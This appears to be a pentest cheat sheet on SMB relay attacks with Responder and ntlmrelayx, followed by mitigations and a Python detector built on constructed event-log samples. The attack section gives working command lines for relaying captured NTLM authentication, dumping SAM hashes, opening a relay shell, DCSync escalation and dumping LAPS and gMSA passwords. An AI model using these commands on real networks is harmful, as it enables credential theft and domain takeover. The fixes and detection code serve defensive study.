# smb relay ntlmrelayx

**REQUIREMENTS:**

* SMB signing must be disabled.
* The relayed user's credentials must have admin rights on the target machine.

## Information

To invoke this attack, request a callback to SMB on the Kali host using `\\IP`.

1. `responder` captures the request and passes it to `ntlmrelayx`.
2. `ntlmrelayx` relays the request to the targets in TARGET.txt.
   1. Enables RemoteRegistry
      1. Captures the system bootkey
      2. Performs the intended action. Default action: SAM dump using `secretsdump.py`
      3. Restores RemoteRegistry to its disabled state.

```bash
impacket-ntlmrelayx [-6] [-t TARGET | -tf TARGET_FILE] -smb2support [-l LOOT_DIR] [-i] [-e "SHELL.exe"] [-c "COMMANDS"]
# -6: IPv6
# -i: will open an SMB shell, can connect using nc IP PORT
# --escalate-user USER: will escalate to add ACL Replication-Get-Changes-All for USER on DC (DCSync)
# --dump-laps: dump LAPS passwords
# --dump-gmsa: dump gMSA passwords
```

## SMB-check

```bash
nmap --script=smb2-security-mode.nse -p 445 IP/CIDR
```

## Method

1. Set `SMB=Off` and `HTTP=Off` in `/etc/responder/Responder.conf`
2. Run `sudo responder -I INTF -rdwv`
3. Run `ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]`

## Fix

* Enable SMB signing on all devices (can cause performance issues).
* Disable NTLM authentication on the network.
* Account tiering (restricting domain admins to specific tasks).
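
The steps under Information leave a trace defenders can hunt for: RemoteRegistry leaving the disabled state and being set back to disabled within seconds. The following is an added example (not part of the original notes) that flags that pattern, assuming the changes are logged as Service Control Manager event 7040 with English message text. The sample rows, the `find_registry_flips` name and the 60-second window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample rows: (time, host, event_id, message) from the System log.
# Event ID 7040 (Service Control Manager) records a service start-type change.
# Assumption: English message text; localized systems word this differently.
_MSG = "The start type of the Remote Registry service was changed from {} to {}."
SAMPLE_EVENTS = [
    ("2024-05-02T10:14:03", "WS01", 7040, _MSG.format("disabled", "demand start")),
    ("2024-05-02T10:14:09", "WS01", 7040, _MSG.format("demand start", "disabled")),
    # Admin enables the service and leaves it on: no restore, so no hit.
    ("2024-05-02T11:00:00", "WS02", 7040, _MSG.format("disabled", "auto start")),
    # Restore arrives two hours later: outside the default window.
    ("2024-05-02T12:00:00", "WS03", 7040, _MSG.format("disabled", "demand start")),
    ("2024-05-02T14:00:00", "WS03", 7040, _MSG.format("demand start", "disabled")),
    # Different service: ignored.
    ("2024-05-02T15:00:00", "WS04", 7040,
     "The start type of the Windows Update service was changed from disabled to auto start."),
]

CHANGE = re.compile(r"start type of the Remote Registry service was changed "
                    r"from (?P<old>[\w ]+?) to (?P<new>[\w ]+?)\.?$")


def find_registry_flips(events, window=timedelta(seconds=60)):
    """Return (host, enabled_at, restored_at) for every host where RemoteRegistry
    left the disabled state and was set back to disabled within `window`."""
    pending = {}  # host -> time the service left 'disabled'
    hits = []
    for ts, host, event_id, message in sorted(events):
        match = CHANGE.search(message)
        if event_id != 7040 or not match:
            continue
        when = datetime.fromisoformat(ts)
        old, new = match["old"].lower(), match["new"].lower()
        if old == "disabled" and new != "disabled":
            pending[host] = when
        elif new == "disabled" and host in pending:
            enabled_at = pending.pop(host)
            if when - enabled_at <= window:
                hits.append((host, enabled_at, when))
    return hits


if __name__ == "__main__":
    for host, start, end in find_registry_flips(SAMPLE_EVENTS):
        print(f"{host}: RemoteRegistry enabled {start}, restored {end} - review logons")
```

A hit is a lead, not a verdict: correlate it with network logons to the same host in the same window before escalating.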

